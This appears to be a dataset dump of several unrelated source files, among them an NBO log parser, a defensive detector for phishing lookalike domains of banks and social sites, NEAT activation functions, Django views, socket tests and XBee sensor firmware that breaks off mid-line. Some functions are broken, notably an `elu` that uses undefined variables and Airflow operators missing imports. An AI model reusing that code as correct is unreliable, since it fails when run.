logfile=[]\r\n with open(str(listFileNames[files]),'r') as f: #reads the .log file in reading only mode\r\n flag = False #orbitals and total lewis\r\n for line in f:\r\n if line.startswith(' Total Lewis'): #iterates through all the files, name by name and only reads data between natural bond\r\n flag=False \r\n if flag:\r\n logfile.append(line)\r\n if line.startswith(' Natural Bond Orbitals (Summary):'):\r\n flag=True\r\n return(logfile)\r\n\r\n#NBO analysis\r\n \r\nallNBOforallfiles = [] \r\nfor files in range(len(listFileNames)): #iterates through all the .log files\r\n NBOsummary= get_logfiles(files) #returns the NBO summary of the .log file as a list of str \r\n# NBO analysis list \r\n allNBO=[]\r\n#NBOs are extracted by searching the NBO Summary with a regular expressions re \r\n#Extraction of the LP. This sequence returns a list of list. The sublists are empty if the str is not found, sublist contains the whole line if a str is re.match for the line. \r\n LP_occ_energy = []\r\n LPatoms = list(dfAtomLabels.iloc[files])\r\n#re.match also matches empty spaces to account for integer with more than one digit all atom lables are filled to have 4 characters: 1 becomes ' 1'\r\n for m in range(len(LPatoms)):\r\n LPatoms[m]= str(LPatoms[m])\r\n LPatoms[m]= LPatoms[m].rjust(4)\r\n#searches for the appropriate LP withe by iterating through all atoms in the atom labele\r\n for m in range(len(list(dfAtomLabels.iloc[files]))):\r\n \r\n r1 = re.compile(\".*LP [(] 1[)] \\S\" + LPatoms[m]) \r\n r2 = re.compile(\".*LP [(] 2[)] \\S\" + LPatoms[m]) \r\n r3 = re.compile(\".*LP [(] 3[)] \\S\" + LPatoms[m])\r\n \r\n LP_occ_energy.append(list(filter(r1.match, NBOsummary))) \r\n LP_occ_energy.append(list(filter(r2.match, NBOsummary))) \r\n LP_occ_energy.append(list(filter(r3.match, NBOsummary)))\r\n#For empty sublists 'nan','nan is returned, for list containing the whole line the occupancy [41:48] and energy [52:60] is returned by selecting the appropriate characters in the line. \r\n for entry in LP_occ_energy:\r\n if entry == []:\r\n allNBO.append('nan')\r\n allNBO.append('nan')\r\n else:\r\n allNBO.append([string[41:48] for string in entry][0])\r\n allNBO.append([string[52:60] for string in entry][0])\r\n \r\n#Extraction of the bonds following the same principle as the lone pairs. \r\n bonds_occ_energy = []\r\n atomcombinations = list(i.combinations(list(dfAtomLabels.iloc[files]), 2))\r\n atomcombinations = [list(x) for x in atomcombinations]\r\n for x in atomcombinations:\r\n x = x.sort()\r\n for n in range(len(atomcombinations)):\r\n for m in range(len(atomcombinations[n])):\r\n atomcombinations[n][m]= str(atomcombinations[n][m])\r\n atomcombinations[n][m]= atomcombinations[n][m].rjust(4)\r\n \r\n a1 = atomcombinations[n][0]\r\n a2 = atomcombinations[n][1]\r\n \r\n r1 = re.compile(\".*BD [(] 1[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r2 = re.compile(\".*BD [(] 2[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r3 = re.compile(\".*BD [(] 3[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r4 = re.compile(\".*BD[*][(] 1[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r5 = re.compile(\".*BD[*][(] 2[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r6 = re.compile(\".*BD[*][(] 3[)] \\S\" + a1 + \" - \\S\" + a2)\r\n \r\n bonds_occ_energy.append(list(filter(r1.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r2.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r3.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r4.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r5.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r6.match, NBOsummary)))\r\n \r\n for entry in bonds_occ_energy:\r\n if entry == []:\r\n allNBO.append('nan')\r\n allNBO.append('nan')\r\n else:\r\n allNBO.append([string[41:48] for string in entry][0])\r\n allNBO.append([string[52:60] for string in entry][0])\r\n \r\n allNBOforallfiles.append(allNBO)\r\n \r\n#Writes a excel output wiht appropriate titles and drops all the columns with no entries. \r\npd.DataFrame(allNBOforallfiles, columns = allNBOtitle, index = dfAtomLabels.index).to_excel('NBO analysis.xlsx')\r\noutputdf = pd.read_excel('NBO analysis.xlsx').dropna(how='all', axis = 1)\r\noutputdf.to_excel('NBO analysis.xlsx')\r\n","sub_path":"descriptors-qm-geom-properties/get_nbo_analysis.py","file_name":"get_nbo_analysis.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"21005701","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'ketian'\n__version__ = '1.04b'\n__email__ = 'ririhedou@gmail.com'\n\nimport sys,re\nfrom os import path\nimport pickle\nimport editdistance\n\n#import pylev\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nEDIT_DISTANCE_THRESHOLD = 2\nHYPHEN_DISTANCE_THRESHOLD = 4\nDOMAIN_LENGTH_THRESHOLD = 20\n\n\ncandidates =[u'facebook', u'youtube', u'paypal', u'bankofamerica.com', u'chase', u'wellsfargo', u'citi' ]\n\nFUZZER_CATEGORY = ['typo-squatting','homo-squatting','bits-squatting','combo-squatting', 'various']\n\nDIR = path.abspath(path.dirname(sys.argv[0]))\nDIR_DB = 'database'\nFILE_TLD = path.join(DIR, DIR_DB, 'effective_tld_names.dat')\nDB_TLD = path.exists(FILE_TLD)\n\n\ndef __domain_tld(domain):\n domain = domain.rsplit('.', 2)\n\n if len(domain) == 2:\n return domain[0], domain[1]\n\n if DB_TLD:\n cc_tld = {}\n re_tld = re.compile('^[a-z]{2,4}\\.[a-z]{2}$', re.IGNORECASE)\n\n for line in open(FILE_TLD):\n line = line[:-1]\n if re_tld.match(line):\n sld, tld = line.split('.')\n if not tld in cc_tld:\n cc_tld[tld] = []\n cc_tld[tld].append(sld)\n\n sld_tld = cc_tld.get(domain[2])\n if sld_tld:\n if domain[1] in sld_tld:\n return domain[0], domain[1] + '.' + domain[2]\n\n return domain[0] + '.' + domain[1], domain[2]\n\ndef compare_with_a_base_domain(input_domain_tld,base_domain,original_domain):\n\n #print (input_domain)\n try:\n t1 = small_edit_distance(input_domain_tld,base_domain)\n t2 = direct_contain_basename_with_larger_distance(input_domain_tld,base_domain)\n t3 = long_hyphens_identify(input_domain_tld,base_domain)\n\n if t1 or t2 or t3:\n print (original_domain)\n f = open(base_domain + '.log', 'a')\n f.write(original_domain)\n f.write('\\n')\n f.flush()\n f.close()\n\n except:\n f = open('log-error.log','a')\n f.write(input_domain_tld)\n f.write('\\n')\n f.flush()\n f.close()\n\n\ndef long_hyphens_identify(input_domain, base_domain):\n # long hyphens\n domain, tld = __domain_tld(input_domain)\n def count_continous_hypens(domain):\n count = 0\n for i in domain:\n if i == u'-':\n count += 1\n if count > HYPHEN_DISTANCE_THRESHOLD:\n return True\n else:\n count = 0\n if count > HYPHEN_DISTANCE_THRESHOLD:\n return True\n return False\n\n if count_continous_hypens(domain):\n return True\n\n return False\n\n\ndef direct_contain_basename_with_larger_distance(input_domain, base_domain):\n\n # contain the keyword of the basename\n domain, tld = __domain_tld(input_domain)\n if base_domain in domain:\n distance = editdistance.eval(domain, base_domain)\n if distance > EDIT_DISTANCE_THRESHOLD:\n return True\n\n return False\n\ndef small_edit_distance(input_domain, base_domain):\n\n # a small edit-distance\n domain, tld = __domain_tld(input_domain)\n distance = editdistance.eval(domain, base_domain)\n if distance <= EDIT_DISTANCE_THRESHOLD:\n return True\n\n return False\n\ndef long_domain_name(inputdomain):\n\n if len(inputdomain) > DOMAIN_LENGTH_THRESHOLD:\n return True\n\n return False\n\n\ndef loadfrompickle(filename=\"obj.pickle\"):\n with open(filename, 'rb') as handle:\n b = pickle.load(handle)\n print (\"done the loading\")\n return b\n\ndef test(pickle):\n print ('Loading........')\n domainSets = loadfrompickle(pickle)\n\n print (type(domainSets))\n for i in domainSets:\n i = i.decode(\"idna\")\n compare_with_a_base_domain(i,u'facebook')\n\n\nif __name__ == \"__main__\":\n\n #test(\"../pickleFile/дети.pickle\")\n #test(\"../pickleFile/ru.pickle\")\n #test(\"../pickleFile/рф.pickle\")\n\n #print (u'facebook' in u'facebook------------------------')\n #print (editdistance.eval(u'facebook',u'facebook------------------------'))\n domain = 'xn--pfarmer-t2a.com'.decode(\"idna\")\n #domain = 'fabooke'.decode('utf-8')\n print (domain)\n #domain = 'facebook'.decode(\"idna\")\n #print domain\n\n print (__domain_tld(\"loging.facebook.----------sub-------------.malicious-domain.com\"))\n print (__domain_tld(\"loging.facebook.----------sub-------------.facebook.com.cn\"))\n #print (count_continous_hypens(domain))\n print (editdistance.eval(domain,u'pfarmer.com'))","sub_path":"code/squatting_detect.py","file_name":"squatting_detect.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"587181149","text":"\"\"\"Module for memory handling, contains memory implementations,\nmemory handling, and other functions as detailed in the class\"\"\"\nclass Memory_Handler:\n\tdef __init__(self):\n\t\t#counter for constant memory\n\t\tself._constant_memory = [0,0,0,0]\n\t\t#counter for variable memory\n\t\tself._variable_memory = [0,0,0,0]\n\n\t#Get memory address of variable\n\tdef _get_memory_address_variable(self, variable_type = None):\n\t\t#variable_type should have value\n\t\tif variable_type is not None:\n\t\t\t#memory address for whole\n\t\t\tif(variable_type == \"whole\"):\n\t\t\t\taddress = (200+self._variable_memory[0])\n\t\t\t\tself._variable_memory[0] = self._variable_memory[0]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for decimal\n\t\t\telif(variable_type == \"decimal\"):\n\t\t\t\taddress = (300+self._variable_memory[1])\n\t\t\t\tself._variable_memory[1] = self._variable_memory[1]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for words\n\t\t\telif(variable_type == \"words\"):\n\t\t\t\taddress = (400+self._variable_memory[2])\n\t\t\t\tself._variable_memory[2] = self._variable_memory[2]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for boolean\n\t\t\telif(variable_type == \"boolean\"):\n\t\t\t\taddress = (500+self._variable_memory[3])\n\t\t\t\tself._variable_memory[3] = self._variable_memory[3]+1\n\t\t\t\treturn address\n\n\t\t\t#does not recognize variable type\n\t\t\telse:\n\t\t\t\treturn -1\n\n\t#Get memory address of constant\n\tdef _get_memory_address_constant(self, constant_type = None):\n\t\t#constant_type should have value\n\t\tif constant_type is not None:\n\t\t\t#memory address for constant whole\n\t\t\tif(constant_type == \"cst_whole\"):\n\t\t\t\taddress = (600+self._constant_memory[0])\n\t\t\t\tself._constant_memory[0] = self._constant_memory[0]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for constant decimal\n\t\t\telif(constant_type == \"cst_decimal\"):\n\t\t\t\taddress = (700+self._constant_memory[1])\n\t\t\t\tself._constant_memory[1] = self._constant_memory[1]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for constant words\n\t\t\telif(constant_type == \"cst_words\"):\n\t\t\t\taddress = (800+self._constant_memory[2])\n\t\t\t\tself._constant_memory[2] = self._constant_memory[2]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for constant boolean\n\t\t\telif(constant_type == \"cst_boolean\"):\n\t\t\t\taddress = (900+self._constant_memory[3])\n\t\t\t\tself._constant_memory[3] = self._constant_memory[3]+1\n\t\t\t\treturn address\n\n\t\t\t#does not recognize constant type\n\t\t\telse:\n\t\t\t\treturn -1","sub_path":"Delivery_5/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"601595189","text":"import math\n\n\ndef sigmoid_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return 1.0 / (1.0 + math.exp(-z))\n\n\ndef tanh_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return math.tanh(z)\n\n\ndef sin_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return math.sin(z)\n\n\ndef gauss_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return math.exp(-0.5 * z**2) / math.sqrt(2 * math.pi)\n\n\ndef relu_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s if s > 0.0 else 0\n\n\ndef identity_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s\n\n\ndef clamped_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return max(-1.0, min(1.0, s))\n\n\ndef inv_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n if s == 0:\n return 0.0\n\n return 1.0 / s\n\n\ndef log_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(1e-7, s)\n return math.log(z)\n\n\ndef exp_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n \n z = max(-60.0, min(60.0, s))\n return math.exp(z)\n\n\ndef abs_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return abs(s)\n\n\ndef hat_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return max(0.0, 1 - abs(s))\n\n\ndef square_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s ** 2\n\n\ndef cube_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s ** 3\n\n\ndef maxout_activation(bias, links, ivalues):\n inputs = []\n for i, w in links:\n inputs.append(ivalues[i] * w) \n\n return max(inputs) \n\n\ndef elu(x):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s if s > 0 else math.exp(x) - 1\n\n\nclass InvalidActivationFunction(Exception):\n pass\n\n\nclass ActivationFunctionSet(object):\n def __init__(self):\n self.functions = {}\n\n def add(self, config_name, function):\n # TODO: Verify that the given function has the correct signature.\n self.functions[config_name] = function\n\n def get(self, config_name):\n f = self.functions.get(config_name)\n if f is None:\n raise InvalidActivationFunction(\"No such function: {0!r}\".format(config_name))\n\n return f\n\n def is_valid(self, config_name):\n return config_name in self.functions\n\n\n","sub_path":"neat/activations.py","file_name":"activations.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"142957382","text":"def text_writer(string1, string2):\n print(\"Writing {} - {}\".format(string1, string2))\n\n\nclass Invoker(object):\n def __init__(self):\n self.commands = []\n\n def add_command(self, command):\n self.commands.append(command)\n\n def run(self):\n for command in self.commands:\n command[\"function\"](*command[\"params\"])\n\n\nif __name__ == \"__main__\":\n invoker = Invoker()\n invoker.add_command({\n \"function\": text_writer,\n \"params\": (\"Command 1\", \"String 1\")\n })\n invoker.add_command({\n \"function\": text_writer,\n \"params\": (\"Command 2\", \"String 2\")\n })\n invoker.run()\n","sub_path":"design_patterns/Command/command_pattern_func.py","file_name":"command_pattern_func.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"200013871","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Diary, Comment\nfrom django.utils import timezone\nfrom .forms import DiaryForm, CommentForm\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n\n\ndef index(request):\n\n page=request.GET.get('page','1')\n\n diary_list = Diary.objects.order_by('-create_date')\n\n paginator=Paginator(diary_list, 10)\n page_obj=paginator.get_page(page)\n\n context = {'diary_list': page_obj}\n return render(request, 'todolist/diary_list.html', context)\n\n\ndef detail(request, diary_id):\n diary = get_object_or_404(Diary, pk=diary_id)\n context = {'diary': diary}\n return render(request, 'todolist/diary_detail.html', context)\n\n\ndef comment_create(request, diary_id):\n diary = get_object_or_404(Diary, pk=diary_id)\n\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.create_date = timezone.now()\n comment.diary = diary\n comment.save()\n return redirect('todolist:detail', diary_id=diary.id)\n else:\n form = CommentForm()\n\n context = {'diary': diary, 'form': form}\n return render(request, 'todolist/diary_detail.html', context)\n\n diary.comment_set.create(content=request.POST.get(\n 'content'), create_date=timezone.now())\n return redirect('todolist:detail', diary_id=diary.id)\n\n\ndef diary_create(request):\n\n if request.method == 'POST':\n form = DiaryForm(request.POST)\n if form.is_valid():\n diary = form.save(commit=False)\n diary.create_date = timezone.now()\n diary.save()\n return redirect('todolist:index')\n else:\n form = DiaryForm()\n\n context = {'form': form}\n return render(request, 'todolist/diary_form.html', context)\n","sub_path":"mysite1/todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"301249003","text":"import unittest\nimport threading\nimport socket\nimport time\nfrom krpc.connection import Connection\n\nport = None\n\ndef server_thread(started):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind(('', 0))\n global port\n port = sock.getsockname()[1]\n sock.listen(1)\n time.sleep(1)\n started.set()\n\n while True:\n\n # Wait for a connection\n connection, client_address = sock.accept()\n\n # Client connected\n disconnect = False\n sock.settimeout(0.1)\n try:\n # Receive then resend data back to client\n while not disconnect:\n data = connection.recv(16)\n if data:\n if data.startswith(b'disconnect'):\n disconnect = True\n connection.sendall(data)\n else:\n break\n finally:\n connection.close()\n sock.settimeout(None)\n\nclass TestConnection(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls._started_server = threading.Event()\n server = threading.Thread(target=server_thread, args=(cls._started_server,))\n server.daemon = True\n server.start()\n cls._started_server.wait()\n\n def server_close_connection(self, conn):\n conn.send(b'disconnect')\n self.assertEqual(b'disconnect', conn.receive(10))\n # Wait for the connection to close\n while conn._socket.recv(1) != b'':\n pass\n\n def connect(self):\n conn = Connection('localhost', port)\n conn.connect()\n return conn\n\n def test_send_receive(self):\n conn = self.connect()\n conn.send(b'foo')\n self.assertEqual(b'foo', conn.receive(3))\n\n def test_long_send_receive(self):\n conn = self.connect()\n message = b'foo' * 4096\n conn.send(message)\n self.assertEqual(message, conn.receive(len(message)))\n\n def test_long_send_partial_receive(self):\n conn = self.connect()\n message = b'foo' * 4096\n conn.send(message)\n partial = conn.partial_receive(4096)\n self.assertEqual(message[:len(partial)], partial)\n self.assertEqual(message[len(partial):], conn.receive(len(message) - len(partial)))\n\n def test_receive_on_remote_closed_connection(self):\n conn = self.connect()\n self.server_close_connection(conn)\n self.assertRaises(socket.error, conn.receive, 1)\n\n def test_partial_receive_on_remote_closed_connection(self):\n conn = self.connect()\n self.server_close_connection(conn)\n self.assertEquals(b'', conn.partial_receive(1))\n\n def test_send_on_closed_connection(self):\n conn = self.connect()\n conn.close()\n self.assertRaises(socket.error, conn.send, b'foo')\n\n def test_receive_on_closed_connection(self):\n conn = self.connect()\n conn.close()\n self.assertRaises(socket.error, conn.receive, 1)\n\n def test_partial_receive_on_closed_connection(self):\n conn = self.connect()\n conn.close()\n self.assertRaises(socket.error, conn.partial_receive, 1)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"lib/python2.7/site-packages/krpc/test/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"56120766","text":"import datetime\n\nfrom django import template\nfrom base import const\n\nfrom application.pytsm.utils.import_mod import _import_module\nfrom application.pytsm.utils.cfg_queries import get_servers, get_overview_queries, get_alarm_colors\nregister = template.Library()\n\nDEVICE_ALARM = \"\"\"\n{value} {unit}\n\"\"\"\n\nDEVICE_NORMAL = \"\"\"\n{value} {unit}\n\"\"\"\n\n@register.simple_tag\ndef overview_value(value, srv):\n\n servers = get_servers()\n server = servers[srv]\n\n overviews = get_overview_queries()\n\n tabelle_name = server.cfg_pytsm_server_tabelle(overview=True, cl=False)\n tabelle_class = server.cfg_pytsm_server_tabelle(overview=True, cl=True)\n\n db_module = _import_module(\"application.pytsm.models.{}\".format(tabelle_name))\n tabclass = getattr(db_module, tabelle_class)\n\n val = tabclass.objects.filter(name=value).first()\n\n\n if val != None:\n overview = overviews[value]\n\n if overview.cfg_pytsm_overview_unit == '#': # Only number value without sign\n res_unit = \"\"\n\n else:\n res_unit = overview.cfg_pytsm_overview_unit\n\n res = DEVICE_NORMAL.format(value=val.results, unit=res_unit) # Default erow\n\n if overview.cfg_pytsm_base_alert_val != None or overview.cfg_pytsm_base_alert_val != '--empty--' :\n # can we change to float\n try:\n result = float((val.results).replace(\",\",\".\"))\n compare = float((overview.cfg_pytsm_base_alert_val).replace(\",\",\".\"))\n except:\n # change to float is not possible (datetime)\n result = val.results\n compare = overview.cfg_pytsm_base_alert_val\n\n if overview.cfg_pytsm_base_alert_cmp == 'less':\n if result < compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n elif overview.cfg_pytsm_base_alert_cmp == 'notequal':\n if result != compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n elif overview.cfg_pytsm_base_alert_cmp == 'equal':\n if result == compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n elif overview.cfg_pytsm_base_alert_cmp == 'more':\n if result > compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n return res\n","sub_path":"application/pytsm/templatetags/pytsm_tags.py","file_name":"pytsm_tags.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"607544111","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 20 10:28:22 2017\n\n@author: denys\n\"\"\"\ndef writeAWG(signal, samplerateAWG, awg_volt):\n import visa\n import numpy as np\n import time\n \n \n # Connect to Instruments\n rm = visa.ResourceManager()\n rs = rm.list_resources()\n for i in range (0,len(rs)):\n pruf=rs[i]\n test=pruf.find(\"USB\")\n if test != -1:\n index=i\n awg_id = rs[index]\n AWG = rm.open_resource(awg_id)\n \n ##################################################\n ################## Write to AWG ##################\n ##################################################\n \n AWG.write(\"*RST\") \n #time.sleep(5)\n AWG.write(\"DATA:VOLatile:CLEar\")\n #time.sleep(5)\n myrange=max(abs(max(signal)),abs(min(signal)))\n #Data Conversion from V to DAC levels\n data_conv = np.round(signal*32766/myrange); \n data_conv = \",\".join(str(e) for e in data_conv)\n AWG.write(\"SOURce1:DATA:ARBitrary:DAC myarb ,\" + data_conv)\n time.sleep(10)\n AWG.write(\"SOURce1:FUNCtion:ARBitrary 'myarb'\")\n time.sleep(10)\n AWG.write(\"SOURce1:FUNCtion ARB\") #USER\n AWG.write(\"DISPlay:FOCus CH1\")\n AWG.write(\"DISPlay:UNIT:ARBRate FREQuency\")\n AWG.write(\"SOURce1:FUNCtion:ARBitrary:SRATe \" + str(samplerateAWG))\n AWG.write(\"SOURce2:DATA:ARBitrary:DAC myarb ,\" + data_conv)\n AWG.write(\"SOURce2:FUNCtion:ARBitrary 'myarb'\")\n time.sleep(10)\n AWG.write(\"SOURce2:FUNCtion ARB\") #USER\n AWG.write(\"DISPlay:FOCus CH2\")\n AWG.write(\"DISPlay:UNIT:ARBRate FREQuency\")\n AWG.write(\"SOURce2:FUNCtion:ARBitrary:SRATe \" + str(samplerateAWG))\n AWG.write(\"FUNC:ARB:SYNC\")\n AWG.write(\"SOURce1:VOLTage \" + str(awg_volt)) \n AWG.write(\"SOURce2:VOLTage \" + str(awg_volt))\n time.sleep(5)\n AWG.write(\"OUTPut1 ON\")\n AWG.write(\"OUTPut2 ON\")\n AWG.write(\"DISPlay:FOCus CH1\")\n \n return (signal, samplerateAWG, awg_volt)","sub_path":"Resources/Original_von_Jens_Literatur_Projektseminar_Python/Material_Denys/Nichtlinear_18042018/writeAWG.py","file_name":"writeAWG.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"487895772","text":"from airflow.utils.decorators import apply_defaults\nfrom airflow.contrib.operators.qubole_operator import QuboleOperator\nfrom airflow.contrib.hooks.qubole_hook import QuboleHook\nfrom cStringIO import StringIO\n\nfrom operators.mojave_pseudo_operator import MojavePseudoOperator\nfrom util.utils import xcom_result\n\n\nclass DemoPythonOperator(MojavePseudoOperator):\n def __init__(self, id=None, **kwargs):\n super(DemoPythonOperator, self).__init__(id, **kwargs)\n self.run = kwargs.get('run')\n\n def call(self, dag):\n if not self.config_task:\n raise Exception(\"Config is must\")\n\n t = PythonOperator(\n task_id=self.id,\n python_callable=self.run,\n provide_context=True,\n templates_dict={\n\n },\n dag=dag\n )\n # The real operator is the PythonOperator\n self.task = t\n return t\n\n def default_format_function(self, record, var=None, config=None):\n return record\n\n @abc.abstractmethod\n def run(self, **context):\n raise NotImplementedError(\n \"The 'run' method of the '{}' MySqlOperator was not implemented\".format(self.id))\n return\n\n @abc.abstractmethod\n def get_results(self):\n raise NotImplementedError(\n \"The 'run' method of the '{}' MySqlOperator was not implemented\".format(self.id))\n return\n\n\nclass DemoQuboleOperator(MojavePseudoOperator):\n def __init__(self, id=None, **kwargs):\n super(DemoQuboleOperator, self).__init__(id, **kwargs)\n self.run = kwargs.get('run')\n\n def call(self, dag):\n if not self.config_task:\n raise Exception(\"Config is must\")\n\n t = PythonOperator(\n task_id=self.id,\n python_callable=self.run,\n provide_context=True,\n templates_dict={\n\n },\n dag=dag\n )\n # The real operator is the PythonOperator\n self.task = t\n return t\n\n\n def default_format_function(self, record, var=None, config=None):\n return record\n\n @abc.abstractmethod\n def run(self, **context):\n raise NotImplementedError(\n \"The 'run' method of the '{}' MySqlOperator was not implemented\".format(self.id))\n return\n\n @abc.abstractmethod\n def get_results(self):\n self.hook = QuboleHook(*self.args, **self.kwargs)\n self.hook.execute(context)\n cmd = self.hook.cmd\n\n if cmd is not None:\n query_result_buffer = StringIO()\n cmd.get_results(fp=query_result_buffer, inline=True)\n query_result = query_result_buffer.getvalue().strip()\n query_result_buffer.close()\n row_list = filter(None, query_result.split('\\r\\n'))\n return row_list\n","sub_path":"conf_demo/dags/demo_operators.py","file_name":"demo_operators.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244255534","text":"from functions import *\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Takes data from QC and creates stacked bar plots')\n parser.add_argument('--inputfile', type=str,\n default='~/Desktop/datafile.csv',\n help='Input file name, including directory')\n parser.add_argument('--htmlfile', type=str, default='dehost_report.html',\n help='File name for HTML file')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n df = pd.read_csv(args.inputfile)\n df2 = read_data(df)\n html = create_html_table(df, df2)\n fig = create_subplots(df2)\n\n write_html_file(args, df2, fig, html)","sub_path":"dehost_report.py","file_name":"dehost_report.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"310741681","text":"\"\"\"\nBryce Martin and David Carlson\n\nECE 4800 - Senior Project\n\nNetwork setup pulled from Digi manual for XBee3 quick setup/start\n\nThis code runs on the Xbee3 acting as a router sending the data it\ncollects to the coordinator. Pins that collect data are labeled.\n\"\"\"\nimport xbee\nimport time\nfrom machine import Pin, ADC\n\nSLEEP_DURATION = 60 * 1000 # In seconds between soil samples\nAVERAGE_SAMPLES = 3 # Number of soil samples to be taken before transmission\nLOW_VOLT_THRESH = 2300 # Voltage floor before sleep duration time is increased.\nLOW_LIGHT_THRESH = 500 # Photoresistor ceiling before sleep duration time is increased.\nSLEEP_MULTIPLIER = 3 # Sleep duration will be multiplied by this number if one of the above conditions are met\n\n# Set the identifying string of the radio\nxbee.atcmd(\"NI\", \"Sensor Probe\")\n\n# Configure some basic network settings\nnetwork_settings = {\"AV\": 2, \"EE\": 0, \"ID\": 0xABCD, \"SM\": 6}\n# \"CE\": 0\n\nfor command, value in network_settings.items():\n xbee.atcmd(command, value)\nxbee.atcmd(\"AC\") # Apply changes\ntime.sleep(1)\n\n# Query AI until it reports success\nprint(\"Connecting to network, please wait...\")\nwhile xbee.atcmd(\"AI\") != 0:\n time.sleep_ms(100)\nprint(\"Connected to Network\\n\")\nxbee.transmit(xbee.ADDR_COORDINATOR, \"{'Sector': 1, 'Moisture': 4096, 'Sunlight': 4096, 'Battery': 3333, 'Tilt': 1}\")\n\noperating_network = [\"OI\", \"OP\", \"CH\"]\nprint(\"Operating network parameters:\")\nfor cmd in operating_network:\n print(\"{}: {}\".format(cmd, xbee.atcmd(cmd)))\n# Wait for hub acknowledgement\n\n# Pin Setup\n# Unused Pins are set as outputs to reduce sleep current\nPin(\"D1\", Pin.OUT)\nlight_sensor = ADC(\"D2\")\nmoisture_probe = ADC(\"D3\")\nPin(\"D4\", Pin.OUT)\nPin(\"D6\", Pin.OUT)\nPin(\"D7\", Pin.OUT)\ntilt_switch = Pin(\"D8\", Pin.IN, Pin.PULL_DOWN)\nPin(\"D9\", Pin.OUT)\nsleep_enable = Pin(\"P2\", Pin.IN, 